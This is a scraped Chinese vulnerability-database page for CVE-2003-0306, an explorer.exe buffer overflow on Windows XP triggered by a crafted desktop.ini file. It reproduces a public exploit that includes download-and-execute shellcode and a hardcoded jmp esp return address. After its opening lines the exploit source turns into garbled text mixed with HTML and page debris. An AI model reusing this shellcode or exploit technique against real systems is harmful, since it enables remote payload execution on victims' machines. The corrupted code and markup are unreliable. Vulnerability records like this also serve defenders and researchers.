authorB=cs
CVE-2003-0306
CVSS7.2
发布时间 :2003-06-09 00:00:00
修订时间 :2017-10-10 21:29:08
NMCOE    

[原文]Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter.


[CNNVD]Windows XP EXPLORER.EXE 缓冲区溢出漏洞(CNNVD-200306-036)

        Windows XP中的EXPLORER.EXE存在缓冲区溢出漏洞。攻击者可以通过带有.ShellClassInfo参数的desktop.ini文件和XP用户一样执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:3095WinXP Explorer Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0306
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0306
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-036
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105284486526310&w=2
(UNKNOWN)  BUGTRAQ  20030511 Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
http://marc.info/?l=bugtraq&m=105301349925036&w=2
(UNKNOWN)  BUGTRAQ  20030515 Re[2]: EXPLOIT: Buffer overflow in Explorer.exe on Windows XP SP1
http://marc.info/?l=vuln-dev&m=105241032526289&w=2
(UNKNOWN)  VULN-DEV  20030507 Buffer overflow in Explorer.exe
http://www.microsoft.com/technet/security/bulletin/ms03-027.asp
(UNKNOWN)  MS  MS03-027

- 漏洞信息

Windows XP EXPLORER.EXE 缓冲区溢出漏洞
高危 缓冲区溢出
2003-06-09 00:00:00 2005-10-20 00:00:00
本地  
        Windows XP中的EXPLORER.EXE存在缓冲区溢出漏洞。攻击者可以通过带有.ShellClassInfo参数的desktop.ini文件和XP用户一样执行任意代码。

- 公告与补丁

        

- 漏洞信息 (32)

MS Windows XP (explorer.exe) Buffer Overflow Exploit (EDBID:32)
windows local
2003-05-21 Verified
0 einstein
N/A [点击下载]
#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
  "\x81\xec\x40\x1f\x00\x00\xe8\x00\x00\x00\x00\x5d\x83\xed\x0b\xbf\x61\x57" 
  "\x7a\x74\xe8\x8c\x00\x00\x00\x89\xbd\x17\x01\x00\x00\xbf\x65\x1d\x22\x74" 
  "\xe8\x7c\x00\x00\x00\x89\xbd\x1b\x01\x00\x00\xbf\x17\x75\x79\x70\xe8\x6c" 
  "\x00\x00\x00\x89\xbd\x1f\x01\x00\x00\x8d\x85\x2c\x01\x00\x00\x50\x2e\xff" 
  "\x95\x17\x01\x00\x00\x8d\x9d\x33\x01\x00\x00\x53\x50\x2e\xff\x95\x1b\x01" 
  "\x00\x00\x6a\x00\x6a\x00\x8d\x8d\x4e\x01\x00\x00\x51\x8d\x8d\x5c\x01\x00" 
  "\x00\x51\x6a\x00\xff\xd0\x8d\x85\x23\x01\x00\x00\x50\x2e\xff\x95\x17\x01" 
  "\x00\x00\x8d\x9d\x46\x01\x00\x00\x53\x50\x2e\x8b\x9d\x1b\x01\x00\x00\xff" 
  "\xd3\x6a\x01\x8d\x8d\x4e\x01\x00\x00\x51\xff\xd0\x6a\x00\x2e\xff\x95\x1f" 
  "\x01\x00\x00\xbb\x3c\x00\x00\x01\x8b\x0b\x81\xc1\x04\x00\x00\x01\x8d\x41" 
  "\x14\x8b\x70\x68\x81\xc6\x00\x00\x00\x01\x8b\x06\x83\xf8\x00\x74\x51\x05" 
  "\x00\x00\x00\x01\x8b\x56\x10\x81\xc2\x00\x00\x00\x01\x8b\x18\x8b\xcb\x81" 
  "\xe1\x00\x00\x00\x80\x83\xf9\x00\x75\x2a\x81\xc3\x00\x00\x00\x01\x83\xc3" 
  "\x02\x33\xc9\x32\x0b\xc1\xc1\x08\x43\x80\x3b\x00\x75\xf5\x3b\xcf\x75\x04" 
  "\x8b\x3a\xeb\x16\x83\xc2\x04\x83\xc0\x04\x66\x83\x38\x00\x75\xc7\x83\xc6" 
  "\x14\x8b\x10\x83\xfa\x00\x74\xa8\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
  "\x00\x00\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x00\x55\x52\x4c\x4d\x4f\x4e" 
  "\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65" 
  "\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x5c\x7e\x57\x52\x46\x35\x36\x33" 
  "\x34\x2e\x74\x6d\x70\x00";

char unicode_header[] = "\xFF\xFE";
char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

#define OVERFLOW_LEN 0xA1C


void main()
{
  char url[]="file://c:/winnt/system32/calc.exe";
 // char url[]="http://localhost/cmd.exe";
  char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)


  char path[500]; 
  strcpy(path,"domain HELL team");
  mkdir(path);
  SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
  strcat(path,"\\desktop.ini");

  ofstream out(path,ioth,NLY)_ATgat(pa
 t(pa
 t(pa
 t(pa
 top."><  oeAtLE_ATTRIBUTE_REt;\x01\x00\x00\e
R)-1)uot;\xcc\xzerob\x0uot;\, Ge(int i=0;include len(ot;[.ShellCl);i++)ot;\3469046"><  oeAtL(UNKNot;[.ShellClai],1'text/ja"><  oeAtL(UNKNzero,1'text/}
  strcpy(d;
 B'uot;\, Ge(i=0;inclu

void mai;i++)a"><  oeAtL(UNKNy(d,1)uot;\xcc\xeb\xfb\x77&quo1234] = "\"><  oeAtLeb\,4(path,iostrcpy(d0b\x1path,iot><  oeAtLei\,4(path,iostrcpy(d2;
 C'uot;\, Ge(i=0;inclu12;i++)a"><  oeAtL(UNKNy(d,1)uot;ath,iot><  oeAtL have anyt;\x01\x have any)-1)uot;\"><  oeAtLErlt;\x01\x0rl))uot;at  int len;
;\x01\x have any)-1+;\x01\x0rl)uot;\p <f(] = &q have any+0rl: %d byUTE\n] = &q,len)uot;\if (len%2s:' 1) ot;\3469046p <f(] = &qit'seadd, soram
 1oestra byUTth);
  SetFja"><  oeAtL(UNKNy(d2,1'text/}
 ot;\">< close((path,}ath,
 te milw0rm [     
<]_edb/assdiv> <"0" widb"> ript src=" title=css"> tr td label { width: 80px; float: left; font-weight: bold; } textarea { border-ick="pm('infal')"> -<>OSVDB< 漏洞信息 title=cs diCVE-2003-B timmB solu003-B "pmB< 漏洞信息 找参考able width="90%"order="0" align="center" id="info_cnnvd"> "pmB=cs
WinX
   &n洞名称:MS Windows XP (explor/securit.EXE 缓冲区溢出漏h a long .Shmeter.

P
idth="20%">
 &:COM/labelLo/searcI"> g27.alabel>代码下载:
0ref="ht Pub
- 洞able width="90%"order="0" align="center" id="info_cnnvd">
 &:代码下载: solu003-_info_edb32" class="pm">-解决/案able width="90%"order="0" align="center" id="info_cnnvd">
"pm_officialref" class="
70%" /sty>CIAC Advisory: n-120 /s> alick="pm( "pm(d"')">
ul=" style="widb"> ul="v class="savascript" src="/static/scriptSs"> rder="0" alig35ellpanter" id="info_cnnvd"> spacing="0" class="cvss_div"> itablBaidu B< BEGINtext/japt src="bdsharmB< 漏bdsharm_t bds_incls_32 www- anys-bdsharmB>w.mic 漏bds_ts/wb">td> mic 漏bds_tqq">td> mic 漏bds_renren">td> mic 漏bds_t163">td> mic 漏bds_fx">td> mic 漏bds_baidu">td> m" title="注bds_mormB>息 tablBaidu B< END r>
"widtablDuoshuo es a); BEGINtext/j >

n.p'e="de'ocu (ByTagName('script')[0]; s.hellNode.svdb"||sByTagName('script')[0]; s."maiNode.).appendChild(ds 5pxss="content">th="80px" height=s="cvss_div">pacing="0" class >"')>eginEd客tle>息 < 主 所 了解的客留言">/td> > >"')>eginEd不坃声明d nowrap=="ref="90%" bCVE/CWE/多 tr> > <册商 ,它们/h2>D 漏microsoft.com/teveasurh="803-027.agename.cgitp://www.microsoft > ]Buftd> > >"wb:foxecu- urc="1418901063"keywordred_4""nowrap">r> 5pxss="conten0px">

th="80px" height=s="cvss_div">pacing="0" class 漏洞类glen title="NVD数据已 © espy bord E14.exploit-db.com/dotanceBegiu/1418901063"ke//www.microsoft@evan-csstd> . CCERT.d nowrap0" /> b di已 京ICP备14000297号-table> ababel>漏洞80le搜nbar"> >"ul